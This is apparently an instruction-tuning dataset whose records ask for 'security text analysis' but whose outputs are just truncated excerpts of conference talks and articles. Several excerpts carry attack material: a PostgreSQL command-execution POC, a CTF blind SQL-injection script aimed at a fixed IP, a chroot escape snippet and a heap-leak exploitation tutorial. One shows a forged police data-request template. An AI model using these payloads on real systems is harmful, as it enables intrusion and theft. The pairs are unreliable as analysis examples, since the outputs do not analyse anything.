{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n*** Check out http://fort.ninja/defcon24 for the latest version of this information *** @evanbooth Shotgun Of RANDOM  http://fort.ninja/defcon24#shotgun Finding Potential throughout history George Washington Carver Foods Salted Peanuts Peanut Butter, regular (3) Breakfast Food #1 Butter from Peanut Milk Breakfast Food #2 Pancake Flour Breakfast Food #3 Peanut Flour (11) Breakfast Food #4 Peanut Surprise Breakfast Food #5 Malted Peanuts Bisque Powder Peanut Meal, brown Peanut Meal #1 and #2 Meat Substitutes Chocolate Coated Peanuts Chili Sauce Peanut Cake #1 and #2 Peanut Brittle Dry Coffee Cream Candy Instant Coffee Peanut Flakes (2) Peanut Hearts Chop Suey Sauce Mock Oysters Mayonnaise Worcestershire Sauce Peanut Meat Loaf Peanut Food #1 Shredded Peanuts Peanut Sprouts Peanut Bisque Powder Peanut Tofu Sauce Cooking Oil Cream for Milk Salad Oil Buttermilk Mock Meat Mock Goose Mock Duck Mock Chicken Mock Veal Cut Milks (32) Curds Vinegar Crystallized Peanuts Peanut Relish #1 Peanut Sausage Peanut Relish #2 Flavoring Paste Peanut Chocolate Fudge Oleomargarine Peanut and Pop Corn Bars Dehydrated Milk Flakes Peanut Bar #1 Caramel Peanut Tutti Frutti Bars Butterscotch Lard Compound Evaporated Milk Sweet Pickle Golden Nuts Cheese Cream Substitute Asparagus Cheese Pimento Cheese Nut Sage Cheese Tutti Frutti CheeseSandwich White Pepper, from Vines Pickle, Plain Cocoa Peanut Dainties Peanut Kisses Bar Candy Peanut Wafers Stock Foods Peanut Stock Food #1,#2, and #3 Peanut HullMeal Peanut Hull Stock Food Molasses Feed Peanut HullBran Peanut Hay Meal Hen Food for laying (peanut hearts) Peanut Meal (3) Household Products Laundry Soap Sweeping Compound Beverages Peanut Orange Punch #1 Peanut Lemon Punch Peanut Koumiss Beverage Peanut Punch #2 Normal Peanut Beverage Beverage for Ice Cream Peanut Beverage Flakes Blackberry Punch Plum Punch Evaporated Peanut Beverage Cherry Punch Pineapple Punch Medicines Rubbing Oil Iron Tonic Tannic Acid Medicine similar to Castor Oil Emulsion for", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nStagefright: Scary Code in the Heart of Android Researching Android Multimedia Framework Security Joshua \"jduck\" Drake August 7th 2015 DEF CON 23 Agenda Introduction System Architecture Attack Surface Attack Vectors Vulnerability Discovery / Issues Found Exploitability / Mitigations Disclosure Conclusions Introduction About the presenter and this research About Joshua J. Drake aka jduck Focused on vulnerability research and exploit development for the past 16 years Current Affiliations: Zimperium's VP of Platform Research and Exploitation Lead Author of Android Hacker's Handbook Founder of the #droidsec research group Previous Affiliations: Accuvant Labs (now Optiv), Rapid7's Metasploit, VeriSign's iDefense Labs Motivations 1. Improve the overall state of mobile security 1. Discover and eliminate critical vulnerabilities 2. Spur mobile software update improvements 2. Increase visibility of risky code in Android 3. Put the Droid Army to good use! Special thanks go to Amir Etemadieh of Optiv / Exploiteers for his help with this research. Sponsors This work was sponsored by Accuvant Labs (now Optiv) with continuing support from Zimperium. & Additional thanks to Collin Mulliner and Mathew Solnik! What is Stagefright? Android's Multimedia Framework library written primarily in C++ Handles all video and audio files Provides playback facilities - e.g. {Nu,Awesome}Player Extracts metadata for the Gallery, etc. Brief History Android launched with an engine called OpenCORE Added to AOSP during Android Eclair (2.0) dev Optionally used in Android Froyo (2.2) Both devices I have on 2.2 have it enabled Set as the default engine in Gingerbread (2.3) and later It's also used in Firefox, Firefox OS, etc. first shipped in Firefox version 17 Used on Mac OS X, Windows, and Android NOT used on Linux (uses gstreamer) Why Stagefright? 1. Exposed via multiple attack vectors some of which require no user interaction 2. Binary file format parsers are often vulnerable Especially those written", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# PostgreSQL 高权限命令执行漏洞CVE-2019-9193 PostgreSQL 是一款关系型数据库其9.3到11版本中存在一处特性管理员或具有COPY TO/FROM PROGRAM权限的用户可以使用这个特性执行任意命令 参考链接 - https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5 ## 漏洞环境 启动存在漏洞的环境 ``` docker compose up -d ``` 环境启动后将开启Postgres默认的5432端口默认账号密码为postgres/postgres ## 漏洞复现 首先连接到postgres中并执行参考链接中的POC ```sql DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id'; SELECT * FROM cmd_exec; ``` `FROM PROGRAM`语句将执行命令id并将结果保存在cmd_exec表中 ![](1.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#!/usr/bin/env python \"\"\"Simple HTTP Server With Upload. This module builds on BaseHTTPServer by implementing the standard GET and HEAD requests in a fairly straightforward manner. \"\"\" __version__ = \"0.1\" __all__ = [\"SimpleHTTPRequestHandler\"] __author__ = \"bones7456\" __home_page__ = \"http://li2z.cn/\" import os import posixpath import BaseHTTPServer import urllib import cgi import shutil import mimetypes import re try: from cStringIO import StringIO except ImportError: from StringIO import StringIO class SimpleHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): \"\"\"Simple HTTP request handler with GET/HEAD/POST commands. This serves files from the current directory and any of its subdirectories. The MIME type for files is determined by calling the .guess_type() method. And can reveive file uploaded by client. The GET/HEAD/POST requests are identical except that the HEAD request omits the actual contents of the file. \"\"\" server_version = \"SimpleHTTPWithUpload/\" + __version__ def do_GET(self): \"\"\"Serve a GET request.\"\"\" f = self.send_head() if f: self.copyfile(f, self.wfile) f.close() def do_HEAD(self): \"\"\"Serve a HEAD request.\"\"\" f = self.send_head() if f: f.close() def do_POST(self): \"\"\"Serve a POST request.\"\"\" r, info = self.deal_post_data() print r, info, \"by: \", self.client_address f = StringIO() f.write('<!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">') f.write(\"<html>\\n<title>Upload Result Page</title>\\n\") f.write(\"<body>\\n<h2>Upload Result Page</h2>\\n\") f.write(\"<hr>\\n\") if r: f.write(\"<strong>Success:</strong>\") else: f.write(\"<strong>Failed:</strong>\") f.write(info) f.write(\"<br><a href=\\\"%s\\\">back</a>\" % self.headers['referer']) f.write(\"<hr><small>Powerd By: bones7456, check new version at \") f.write(\"<a href=\\\"http://li2z.cn/?s=SimpleHTTPServerWithUpload\\\">\") f.write(\"here</a>.</small></body>\\n</html>\\n\") length = f.tell() f.seek(0) self.send_response(200) self.send_header(\"Content-type\", \"text/html\") self.send_header(\"Content-Length\", str(l", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x01 前言 看到赛博回忆录白白白师傅发了一篇反制ysoserial的文章于是兴高采烈的准备自己试一把结果在自己动手操作的时 候pa一下没打成功于是和木头师傅探讨了一下因为当时有事第二天才去调试发现了这个乌龙那就分享 一下思路 0x02 正片 一 ysoserial反制 registry.list和registry.bind这两处就是调用的原生的RegistryImpl_Stub会触发UnicastRef#invoke- >StreamRemoteCall#executeCall导致反序列化这里就有反序列化点了 一开始我对反制存疑可以看到这里存在了java沙箱的机值会限制命令的执行 后来验证了一下还真得到了这样的结果 可以看到确实在右边的最底下可以看到存在自定义的SercurityManager去限制了命令的执行可以看到箭头上面所指的 地方这里是在exploit这个方法中执行并捕捉到了命令执行的问题我们去看源代码 可以看到第二个箭头所指向的地方在exploit执行的时候确实是将整段代码放在沙箱内去执行的但是我们可以看到 箭头1所指向的位置理应在这里就会执行反序列化而导致命令的执行 二 调试 因为报错信息里面没有关于list方法的报错先推断一下我们再去跟着源代码调试一下 既然list方法并没有执行成功那应该在这个方法内部会抛出异常 可以看到list函数抛出了两个异常分别是AccessException和RemoteException后面throw的异常都是这两个大类的子 类应该是会捕获的上图的try,catch块是捕获ConnectIOException是RemoteException的子类应该捕获不了希望 知道的师傅可以解答一下 后来当我把jar包拖入idea的时候我傻眼了我以为用的是最新版本结果用的是历史版本 可以看到2018.4.23次的提交支持了sslrmi在之前用list方法测试了一下导致了反制的问题也就是在这个版本之前的 是不会在这个点被反制利用的 三 ExecCheckingSecurityManager 那么我们正好来看一下能否反反制可以看到ysoserial内置了两个自定义的SecurityManager而exploit方法内使用的 是第二个sm让我们来玩玩sm不是看看这个sm 类成员和方法在左边挑一些说可以看到checkExec继承父类的方法这里的cmd参数表示系统特定的命令在本次调 试中就是 cmd.exe 后面可以看到抛出了异常[在类对象生成的时候将throwException参数设成了true]这个 ExecException类的getMessage方法可以在上下文中看到 接下来看第二个callWrapped方法 可以看到首先将系统的sm通过局部变量先保存起来再将系统的sm设置成当前的ExecCheckingSecurityManager对 象try块里面调用了callable可以当作是Runnable接口的增强版的call方法启动了新的线程并将结果返回因为我 们前面提到过在 ysoserial.secmgr.ExecCheckingSecurityManager 对象生成的时候将throwException参数设成了true 所以只要进行了命令执行的方法sm一定会进入checkExec方法那么一定会直接抛出错误所以在这里将命令执行终 止 后续又看了一下绕过沙盒的办法感觉不适用于此处在checkExec直接抛出异常的问题 四  反反制 上面exploit方法没有执行成功的原因就是把代码放在了沙箱内去执行所以反反制的方法也非常简单在try块的list方 法外裹上ysoserial自定义的沙盒 1.内部类中使用但未声明的任何局部变量必须在内部类的正文之前明确分配Java匿名内部类的方法中用到的局部变量 都必须定义为final 所以我声明了一下并且在内部方法内就要捕获这个异常但是为了照顾到下面的exploit方法我们必须要将call方法 的参数值进行一个返回并用一个新的变量接收沙箱内执行的结果 本来的情况 final Registry sandboxRegistry = registry; //将上面getRegistry获取到的registry放到final变量方便沙盒内的 Registry receivedRegistry = new ExecCheckingSecurityManager().callWrapped(new Callable<Registry>(){pub try { sandboxRegistry.list(); } catch (ConnectIOException ex) { ex.printStackTrace(); return LocateRegistry.getRegis", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nT /IA C 中 国 保 险 行 业 协 会 团 体 标 准 T/IAC XXXXX2018 201X-XX-XX 发布 XXXX - XX - XX 实施 201X-XX-XX 印发 ICS 35.100.05, 35.240.40 L79, A11 保险行业研发运营一体化成熟度模型 DevOps maturity model for Internet application in insurance industry 征求意见稿 中国保险行业协会 发 布 T/IAC XXXXX201X I 目 次 前言 ...................................................................... II 引言 ..................................................................... III 1 范围 ............................................................................... 1 2 规范性引用文件 ..................................................................... 1 3 术语和定义 ......................................................................... 1 4 面向保险行业的研发运营一体化流程 ................................................... 2 5 面向保险行业的研发运营一体化成熟度等级划分 ......................................... 2 6 敏捷开发过程能力要求 ............................................................... 3 7 持续交付过程能力要求 ............................................................... 6 8 技术运营过程能力要求 .............................................................. 10 9 系统和工具能力要求 ................................................................ 15 T/IAC XXXXX201X II 前 言 本标准按照GB/T 1.1-2009给出的规则起草 本标准由中国保险行业协会提出并归口 本标准起草单位中国信息通信研究院中国太平洋保险集团股份有限公司中国人寿保险股 份有限公司数据中心中国人民财产保险股份有限公司安心财产保险有限责任公司中国再保险集 团股份有限公司阳光保险集团股份有限公司华为技术有限公司深圳市腾讯计算机系统有限公司 北京优帆科技有限公司云栈科技北京有限公司杭州数梦工场科技有限公司北京易捷思达科技 发展有限公司 本标准起草人 T/IAC XXXXX201X III 引 言 研发运营一体化DevOps在软件的研发和交付过程中将需求开发测试部署和运营有效的 统一实现敏捷开发持续交付和技术运营的集成为了保证保险企业在构建时通过使用研发运营一体 化能够提高IT效能在保证系统运行稳定的同时快速交付高质量软件本标准对保险行业研发运营 一体化成熟度模型从敏捷开发持续交付技术运营系统与工具四方面做出定义 T/IAC XXXXX201X 1 保险行业研发运营一体化成熟度模型 1 范围 本标准规定了保险行业研发运营一体化成熟度模型包括敏捷开发持续交付技术运营系统与 工具四部分 本标准适用于为保险行业云服务科技公司或保险业科技部门建设和实施研发运营一体化的过程中 提供规范 2 规范性引用文件 下列文件对于本文件的应用是必不可少的凡是注日期的引用文件仅所注日期的版本适用于本文 件凡是不注日期的引用文件其最新版本包括所有的修改单适用于本文件 GB/T 32400-2015 信息技术 云计算 概览与词汇 YD/T 1753-2018 研发运营一体化DevOps能力成熟度模型 第 1 部分总体架构 YD/T 1754-2018 研发运营一体化DevOps能力成熟度模型 第 2 部分敏捷开发管理 YD/T 1755-2018 研发运营一体化DevOps能力成熟度模型 第 3 部分持续交付 YD/T 1756-2018 研发运营一体化DevOps能力成熟度模型 第 4 部分技术运营管理 YD/T 1757", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nROARCTF WP By Nu1L ROARCTF WP By Nu1L Misc Hi_433MHz WEB &Revenge hackback ezsql HTML PWN easy_pwn qtnc 2a1 RE Singular DLP steGO slime_war Crypto ecdsa Crypto_System easyrsa Misc Hi_433MHz WEB &Revenge http://47.104.232.98:36301/?url=file:///fl%2561g import string import sys import requests import time payloads = string.ascii_letters + string.digits + '@#$%&*()_+=[]!' headers = {\"Content-Type\": \"application/x-www-form-urlencoded\"} url = \"http://139.129.98.9:30007/\" result = '' for i in range(1, 20): for payload in payloads: starttime = time.time() p = \"username=admin&password=aaa'||/**/(case/**/when/**/(select/**/substr(password ,%s,1)/**/from/**/users)='%s'/**/then/**/pg_sleep(5)/**/else/**/pg_sleep(0)/** /end)||'x'--\" % (i, payload) res = requests.post(url, data=p, headers=headers) if time.time() - starttime > 5: print(payload) hackback result += payload break if payload == '!': print(\"fin:\" + result) sys.exit(0) import copy opcode = [893, 192, 9, 966, 64, 129, 573, 129, 2, 454, 193, 66, 573, 130, 7, 710, 66, 131, 445, 131, 8, 966, 131, 4, 701, 68, 6, 710, 196, 69, 893, 133, 9, 966, 197, 6, 573, 6, 11, 710, 198, 199, 445, 71, 10, 966, 135, 136, 573, 200, 4, 454, 8, 137, 829, 137, 11, 198, 201, 10, 957, 138, 12, 710, 74, 11, 701, 203, 4, 710, 139, 76, 829, 76, 7, 454, 204, 205, 445, 141, 7, 454, 77, 78, 573, 142, 10, 966, 142, 79, 765, 207, 4, 454, 207, 208, 701, 16, 3, 454, 208, 145, 509, 17, 9, 454, 145, 146, 1021, 82, 4, 966, 82, 83, 765, 147, 6, 966, 147, 212, 829, 84, 3, 198, 148, 149, 957, 213, 12, 454, 149, 86, 765, 22, 11, 454, 214, 215, 637, 87, 13, 198, 215, 88, 893, 152, 4, 198, 216, 89, 445, 217, 10, 966, 153, 218, 317, 218, 7, 710, 154, 155, 701, 155, 7, 710, 155, 92, 701, 156, 2, 966, 220, 93, 381, 157, 6, 454, 157, 94, 573, 222, 6, 454, 158, 223, 637, 223, 12, 966, 95, 96, 317, 96, 9, 710, 160, 97, 893, 33, 14, 454, 161, 226, 765, 226, 7, 454, 98, 35, 381, 99, 8, 710, 99, 228, 317, 164, 11, 710, 228, 165, 253, 37, 13, 966, 229, 230, 253, 166, 14, 71", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Growth of Global Election Disinformation: The Role and Methodology of Government-linked Cyber Actors Sandra Quincoses Intelligence Analyst - Nisos About Dr. Sandra Quincoses Current:  Senior Intelligence Analyst at Nisos  Adjunct professor at Florida International University (FIU)- Intelligence Fellowship Program  PhD Social Psychology Former:  OSINT: Department of Defense - US Southern Command  Social Media Intelligence Analyst, Spanish Linguist, and Instructor at Dunami Inc. (Acquired by Babel Street) @Dr_SandraQ Todays Presentation  Disinformation  Geopolitical Setting  Discovery  Content Analysis  Attribution  Motive Revealed  Impact  Post-Publication Behavior  Key Takeaways Disinformation Overview Content with the purpose of misleading the public is dangerous. Intention Who and Why Disinformation thrives during political unrest. @ChalecosAmarill @Chalecoamarills Activities and Subsequent Events Anti-Government Protests in Colombia- May 2021 Mysterious Twitter Account (@Chalecosamarill) Infiltrated Colombia-based Political Discussions/ Posted Misleading Content- May 2021 @Chalecosamarill used domestic hashtags and tweeted pro-Petro content- May 2021 @Chalecosamarill echoed U.S. adversaries media (RUS/IRN/CUB/VEN)- Always @Chalecosamarill engaged with inauthentic Twitter network pretending to be Petro supporters- November 2021 @Chalecosamarill engaged in digital campaign to change Colombias Congress- November 2021 Petro Presidency- June 2022 Petro-U.S. Officials Meet- July 2022 War Games in Venezuela- August 2022 (RUS/IRN/CHN) Background: Colombia  Closest South American ally to the U.S.  Collaborated on national security and economic issues  Only country in South America that has never elected a leftist leader (until now)  Aligned on political concerns involving the governments of Venezuela, Cuba, and Nicaragua Photo Source: US Army Who is Gustavo Petro? As of June 2022, President-elect of Colombia First leftist president of Colombia Friend of the late Fidel C", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDark Data Svea Eckert  Andreas Dewes Who we are Svea Eckert Journalist NDR/ ARD @sveckert @japh44 Andreas Dewes (data) scientist Why we are here US Senate voted to eliminate broadband privacy rules that would have required ISPs to get consumers' explicit consent before selling or sharing Web browsing data (...) 3/23/2017 https://arstechnica.com What does that mean You can see everything  S*#t! ARD, Panorama, 03.11.2016 ARD, Panorama, 03.11.2016 ARD, Panorama, 03.11.2016 I dont know, why I was searching for Tebonin at that time. This is really bad to see something like this  especially if it is connected with my own name. More members of parliament and their employees Employee of Helge Braun, CDU  Assistant Secretary of the German Chancellor How we did it  the hacking part Social engineering What we have discovered 14 days (live) access 3 million (German) User Ids Browsing data for one month cat *.csv | grep \"%40polizei.de\" Autoscout Webseite Sehr geehrte Damen und Herren, im Rahmen eines hier bearbeiteten Ermittlungsverfahrens wegen Computerbetrug (Aktenzeichen) benötige ich gem.  113 TKG i.V.m.  100j StPO eine Auskunft zu Bestandsdaten zu folgender IP-Adresse: xxx.xxx.xxx.xxx Zeitstempel: xx.xx.2016, 10:05:31 MESZ Die Daten werden für die Ermittlung des Täters benötigt. Bitte übersenden Sie Ihre Antwort per Email an die Adresse Vorname.Nachname@polizei.Bundesland.de oder per Telefax. Vorname Nachname Kriminalhauptkommissar Kriminalpolizeidirektion, Ort CyberCrime Telefonnummer Ladies and Gentlemen, because of an investigation concerning computer fraud (file number), which I have dealt with here,  113 TKG i.V.m.  100j StPO I need information on following IP address: xxx.xxx.xxx.xxx Time stamp: xx.xx.2016, 10:05:31 CEST The data is needed to identify the offender. Please send your answer by e-mail to the following address Firstname.lastname@police.state.de or by fax. first name Last Name Detective Chief Place of county Cybercrime phone number Where do I find tilde on", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 DEFCON 2018 USA ALEXANDRE BORGES RING 0/-2 ROOKITS : COMPROMISING DEFENSES DEFCON 2018 - USA ALEXANDRE BORGES - MALWARE AND SECURITY RESEARCHER PROFILE AND TOC TOC:  Introduction  Rootkits: Ring 0  Advanced Malwares and Rootkits: Ring -2  Malware and Security Researcher.  Consultant, Instructor and Speaker on Malware Analysis, Memory Analysis, Digital Forensics, Rootkits and Software Exploitation.  Member of Digital Law and Compliance Committee (CDDC/ SP)  Reviewer member of the The Journal of Digital Forensics, Security and Law.  Refereer on Digital Investigation:The International Journal of Digital Forensics & Incident Response  Instructor at Oracle, (ISC)2 and Ex-instructor at Symantec. 2 DEFCON 2018 - USA ALEXANDRE BORGES - MALWARE AND SECURITY RESEARCHER ACKNOWLEDGMENT DEFCON 2018 - USA 3 Joanna Rutkowska John Loucaides Oleksandr Bazhaniuk Sergey Bratus Vicent Zimmer Yuriy Bulygin Xeno Kovah Alex Bazhaniuk Alex Matrosov Andrew Furtak Bruce Dang Corey Kallenberg Dmytro Oleksiuk Engene Rodionov These professionals deserve my sincere thank you and deep respect for everything I have learned from their explanations and articles. By the way, I continue learning... ALEXANDRE BORGES - MALWARE AND SECURITY RESEARCHER DEFCON 2018 - USA 4 INTRODUCTION ALEXANDRE BORGES - MALWARE AND SECURITY RESEARCHER RING 0/-2 ROOTKITS DEFCON 2018 - USA 5 ADVANCED MALWARES:  MBR/VBR/UEFI rootkits  Tecniques used by rootkits  Kernel Code Signing Bypasses  MBR + IPL infection  BIOS, UEFI and boot architecture  Boot Guard  Secure Boot attacks  WSMT (Windows SMM Security  Mitigation Table)  BIOS Guard  BIOS/UEFI Protections RING 0:  Kernel Callback methods  WinDbg structures  Kernel Drivers Structures  Malicious Drivers  Modern C2 communication  Kernel Pools and APCs ALEXANDRE BORGES - MALWARE AND SECURITY RESEARCHER DEFCON 2018 - USA 6 ROOTKITS: RING 0 ALEXANDRE BORGES - MALWARE AND SECURITY RESEARCHER ROOTKITS: RING 0 7  Kernel Callback Functions, which are are a kind of modern hooks oft", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGo With the Flow: Enforcing Program Behavior Through Syscall Sequences and Origins Claudio Canella claudio.canella@iaik.tugraz.at Abstract As the number of vulnerabilities continues to increase every year, we require more and more methods of constraining the applications that run on our sys- tems. Control-Flow Integrity [1] (CFI) is a concept that constrains an applica- tion by limiting the possible control-flow transfers it can perform, i.e., control flow can only be re-directed to a set of previously determined locations within the application. However, CFI only applies within the same security domain, i.e., only within kernel or userspace. Linux seccomp [4], on the other hand, restricts an applications access to the syscall interface exposed by the operat- ing system. However, seccomp can only restrict access based on the requested syscall, but not whether it is allowed in the context of the previous one. This talk presents our concept of syscall-flow-integrity protection (SFIP), which addresses these shortcomings. SFIP is built upon three pillars: a state machine representing valid transitions between syscalls, a syscall-origin map that identifies locations from where each syscall can originate, and the sub- sequent enforcement by the kernel. We discuss these three pillars and how our automated toolchain extracts the necessary information. Finally, we evalu- ate the performance and security of SFIP. For the performance evaluation, we demonstrate that SFIP only has a marginal runtime overhead of less than 2 % in long-running applications like nginx or memcached. In the security evalu- ation, we first discuss the provided security of the first pillar, i.e., the syscall state machine. We show that SFIP reduces the number of possible syscall tran- sitions significantly compared to Linux seccomp.. In nginx, each syscall can, on average, reach 39 % fewer syscalls than with seccomp-based protection. We also evaluate the provided security of the second pillar, i.e., the syscal", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTimeless Timing Attacks by Tom Van Goethem & Mathy Vanhoef Hello! Tom Van Goethem Researcher at DistriNet - KU Leuven, Belgium Fanatic web & network security enthousiast Exploiter of side-channel attacks in browsers & the Web platform Mathy Vanhoef Postdoctoral Researcher at NYU Abu Dhabi Soon: professor at KU Leuven Interested in Wi-Fi security, software security and applied crypto Discovered KRACK attacks against WPA2, RC4 NOMORE Timing attacks if secret condition: do_something() # continue for el in arr: if check_secret_property(el): break if len(arr_with_secret_elements) > 0: do_something() Remote Timing Attacks  Step 1: attacker connects to target server  Step 2: attacker sends a (large) number of requests to the server  Step 3: for each request attacker measures time it takes to receive a response  Step 4: attacker compares timing of 2 sets of requests (baseline vs target)  Step 5: using statistical analysis, it is determined which request took longer  Step 6: SUCCESS? Remote Timing Attacks Success  Performance of timing attacks is influenced by different aspects:  Network connection between attacker and server  higher jitter  worse performance  attacker could try to move closer to target, e.g. same cloud provider  Jitter is present on both upstream and downstream path  Size of timing leak determines if attack can be successful  Timing difference of 50ms is easier to detect than 5µs  Number of measurements (more  better performance) Server Attacker Server Attacker Server Attacker 00:03:27 Server Attacker 00:03:27 Server Attacker 00:03:27 00:04:48 Server Attacker 00:03:27 00:04:48 ... Number of requests required to determine timing difference (5-50µs) with 95% accuracy based on measurements between university network and AWS imposed maximum: 100,000 EU US Asia 50µs 333 4,492 7,386 20µs 2,926 16,820 - 10µs 23,220 - - 5µs - - - Timeless Timing Attacks Timeless Timing Attacks  Absolute response timing is unreliable, as it will always include jitter for every request  ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 通过堆进行信息泄漏 ## 什么叫信息泄漏 在CTF中Pwn题目一般都是运行在远端服务器上的因此我们不能获知服务器上的libc.so地址Heap基地址等地址信息但是在进行利用的时候往往需要这些地址此时就需要进行信息泄漏 ## 信息泄漏的目标 信息泄漏的目标有哪些我们可以通过观察内存空间来获知这一点 ``` Start End Offset Perm Path 0x0000000000400000 0x0000000000401000 0x0000000000000000 r-x /home/pwn 0x0000000000600000 0x0000000000601000 0x0000000000000000 r-- /home/pwn 0x0000000000601000 0x0000000000602000 0x0000000000001000 rw- /home/pwn 0x0000000000602000 0x0000000000623000 0x0000000000000000 rw- [heap] 0x00007ffff7a0d000 0x00007ffff7bcd000 0x0000000000000000 r-x /lib/x86_64-linux-gnu/libc-2.23.so 0x00007ffff7bcd000 0x00007ffff7dcd000 0x00000000001c0000 --- /lib/x86_64-linux-gnu/libc-2.23.so 0x00007ffff7dcd000 0x00007ffff7dd1000 0x00000000001c0000 r-- /lib/x86_64-linux-gnu/libc-2.23.so 0x00007ffff7dd1000 0x00007ffff7dd3000 0x00000000001c4000 rw- /lib/x86_64-linux-gnu/libc-2.23.so 0x00007ffff7dd3000 0x00007ffff7dd7000 0x0000000000000000 rw- 0x00007ffff7dd7000 0x00007ffff7dfd000 0x0000000000000000 r-x /lib/x86_64-linux-gnu/ld-2.23.so 0x00007ffff7fdb000 0x00007ffff7fde000 0x0000000000000000 rw- 0x00007ffff7ff6000 0x00007ffff7ff8000 0x0000000000000000 rw- 0x00007ffff7ff8000 0x00007ffff7ffa000 0x0000000000000000 r-- [vvar] 0x00007ffff7ffa000 0x00007ffff7ffc000 0x0000000000000000 r-x [vdso] 0x00007ffff7ffc000 0x00007ffff7ffd000 0x0000000000025000 r-- /lib/x86_64-linux-gnu/ld-2.23.so 0x00007ffff7ffd000 0x00007ffff7ffe000 0x0000000000026000 rw- /lib/x86_64-linux-gnu/ld-2.23.so 0x00007ffff7ffe000 0x00007ffff7fff000 0x0000000000000000 rw- 0x00007ffffffde000 0x00007ffffffff000 0x0000000000000000 rw- [stack] 0xffffffffff600000 0xffffffffff601000 0x0000000000000000 r-x [vsyscall] ``` 首先第一个是主模块的基地址因为只有在开启PIE(地址无关代码)的情况下主模块的基地址才会发生改变因此通常情况下主模块的地址不需要泄漏 第二个是堆地址堆地址对于进程来说是每次运行都会改变当然需要控制堆中的数据时可能就需要先泄漏堆基地址 第三个是libc.so的地址在很多情况下我们只有通过libc中的system等函数才能实现代码执行并且malloc_hookone_gadgetsIO_FILE等结构也都储存在libc中因此libc的地址也是我们泄漏的目标 ## 通过什么进行泄漏 通过前面的知识我们知道heap分为unsorted binfastbinsmallbinlarge bin等我们逐个考察这些结构来查看如何进行泄漏 ## unsorted bin 我们构造两个unsorted ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLinux Containers: Future or Fantasy? Aaron Grattafiori Technical Director NCC Group (aka iSEC Partners/Matasano Security/Intrepidus Group) DEF CON 23 Infosec, pentesting, Neg9/CTF iSEC Partners for 5.5 years NCC Group for 0.1 years Hacking Samsung Smart TVs @ BH USA 2013, Toorcon, etc Macs in the age of the APT @ BH USA 2011, Source, etc 2015 NCC Group 2 whoami These slides are not intended to be consumed without the corresponding presentation or whitepaper. The information contained within is designed for presenting and not 100% completeness with regards to risks, recommendations, findings, etc. 2015 NCC Group - INTERNAL 3 Disclaimer 2015 NCC Group 4 whoami 2015 NCC Group 5 Story One: The Server Bobs Ruby on Rails app gets popped or his SQL database server is compromised or his Wordpress plugin gives RCE or . He wants to add security... But how? 2015 NCC Group 6 Once Upon a Time OLD The tried and true still used today Broken if you have root 2015 NCC Group 7 Chroot ? mkdir(ncc\"); chroot(ncc\"); chdir(\"../..\");  oh no chroot(\".\"); 2015 NCC Group 8 Chroot  2015 NCC Group 9 SELinux ? NSA made it Complex type system for MLS systems Good support on RHEL 2015 NCC Group 10 SELinux ? Complexity Linus Torvalds problem The setenforce 0 problem Kernel enforces it: Kernel gotta kernel 2015 NCC Group 11 SELinux (and other MAC)  Well youve protected the kernel, apps and helped prevention memory corruption and hardened against other attacks but 2015 NCC Group 12 OK, No MAC but grsecurity! 2015 NCC Group 13 Full Virtual Machines? QEMU, KVM or ESX escapes Recent Xen/QEMU updates anyone? VM for single process? Nope. 2015 NCC Group 14 Full Virtual Machines  2015 NCC Group 15 Story Two: The Client Gulenn talks to a potential source named citizenfour He cant use a Chromebook because he is paranoid of Google 2015 NCC Group 16 Once Upon a Time Malware is just for Windows OSX sucks, its insecure Linox is like super sakure right? 2015 NCC Group 17 Hey, just use Linux! Hes one webkit or gekc", "category": "text_analysis", "source": "security_papers"}
